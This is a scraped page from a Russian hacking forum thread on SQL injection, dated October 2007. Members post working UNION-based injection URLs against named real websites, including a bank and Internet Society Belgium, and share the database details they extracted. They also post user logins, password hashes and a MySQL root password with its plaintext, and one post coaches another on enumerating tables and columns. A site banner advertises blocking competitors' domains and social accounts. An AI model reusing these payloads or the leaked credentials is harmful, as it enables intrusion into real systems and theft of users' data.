SQL Инъекции

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 332 из 1602

332

Опции темы

Поиск в этой теме

Опции просмотра

24.10.2007, 21:45

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

Цитата:

Сообщение от [53x]Shadow

а антибоян посмотреть забыл? =\

Посмотри предыдущий пост до моего.

𝕏 Twitter Reddit Telegram Копировать ссылку

22.10.2007, 23:28

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

http://ru-board.com/new/print.php?sid=null+union+select+1,2,3,4,5,6/*

23.10.2007, 00:51

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

С нами: 9780227

Репутация: 1423

http://www.ofmycity.com/afisha/?a=seeitem&id=-1+union+select+1,2,3,4,5,6,concat(version(),0x2F,d atabase(),0x2F,user()),8,9/*

5.0.37-log/afisha/afishamoder@localhost

http://brand.xab.info/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,2,3,4,5,6,7,concat(version(),0x2F ,database(),0x2F,user()),9,10,11,12,13,14,15,16,17 ,18,19,20,21/*

4.0.24/xabinfo/portal@localhost

http://www.bodybuilding.spb.ru/index.php?lan=ru&cont=news&id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7/*

4.0.20-standard/whbody1/whbody1@localhost

http://www.zyll.net/news.php?id=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3,4,5,6,7/*

4.1.22-log/freemp3_slovo/freemp3_slovo@goliaph

23.10.2007, 01:38

-MoLoToK-

Познающий

Регистрация: 04.10.2007

Сообщений: 32

С нами: 9791439

Репутация: 88

Код:

http://www.llatalent.com/current/index.php?current_id=999999+union+select+1,2,concat(version(),0x2F%20,database(),0x2F,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

4.0.27-standard/admin_llatalent_com/dbm.llatalent.com@web175.megawebservers.com

Последний раз редактировалось -MoLoToK-; 23.10.2007 в 01:40..

23.10.2007, 13:41

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

С нами: 9981026

Репутация: 728

Промторгбанк

Цитата:

http://www.ptbank.ru/doc.php?id=-2+union+select+1,2,user,password,4,6,7,8+from+mysq l.user+limit+0,1/*

Version: 4.0.24-log
User: wechsel@localhost

Username (mysql): root
Password (mysql): 5be593ab2a724d73: q1w2e3r4

23.10.2007, 13:58

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

С нами: 10194175

Репутация: 524

Internet Society Belgium

Код:

http://www.isoc.be/news.php?ID=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/*

5.0.32-Debian_7etch1:isocbe:isoceccorg@localhost
171 таблица:

Код:

http://www.isoc.be/news.php?ID=-1+union+select+table_name+from+information_schema.tables+limit+171,1/*

Есть несколько интересных таблиц (cms_users, phpbb_users, tbllogins, tblusers, isoc_users, phpbb_nonsenseusers),
но смог подобрать только одно поле username из таблицы tblusers.

23.10.2007, 14:45

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

С нами: 9780227

Репутация: 1423

kubmarket.ru

http://www.kubmarket.ru/news/view/?id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7/*

4.1.22/wwwkubmarketru/kubmarke@localhost

http://www.kubmarket.ru/news/view/?id=-1+union+select+1,2,concat(userlogin,0x2F,userpassw ord,0x2F,useremail),4,5,6,7+from+users+limit+0,1/*

логин/пароль/мейл не хеш.

23.10.2007, 15:26

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

С нами: 10172486

Репутация: 874

2 fRg
http://www.isoc.be/news.php?ID=-1+union+select+column_name+from+information_schema .columns%20where%20table_name=CHAR(116,98,108,117, 115,101,114,115)%20limit%202,1/*

Не нужно ничего "подбирать" это пятая версия мускула, значит можно все увидеть

При этом запросе мы видим что есть поле Paswoord (именно так 2 буквы "о").
Аналогично смотрим другие таблицы и столбики в них.

23.10.2007, 18:48

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

С нами: 9780227

Репутация: 1423

sexarea.ru

http://www.sexarea.ru/news/detail.php?news=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3/*

5.1.20-beta/sexarea_usexar11/sexarea_usexar11@localhost

http://www.sexarea.ru/news/detail.php?news=-1+union+select+1,concat(username,0x2F,user_passwor d,0x2F,user_icq),3+from+zf_users/*

логин/хеш/уин

#10

23.10.2007, 20:35

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

С нами: 9881483

Репутация: 569

Код:

http://www.livemusicdirect.co.uk/bands.php?band_id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(user_id,0x3a,username,0x3a,password)+from+user_ login+limit+684,1/*&start=0

код:

http://www.livemusicdirect.co.uk/bands.php?band_id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(0x3a,user_id,status_id,surname,forename,tel, mobile,email,userType,pass)+from+user+limit+700,1/*&start=0